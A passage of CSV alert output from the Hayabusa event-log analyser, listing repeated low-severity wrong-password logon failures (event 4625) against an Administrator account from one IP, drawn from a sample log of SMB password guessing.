NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: 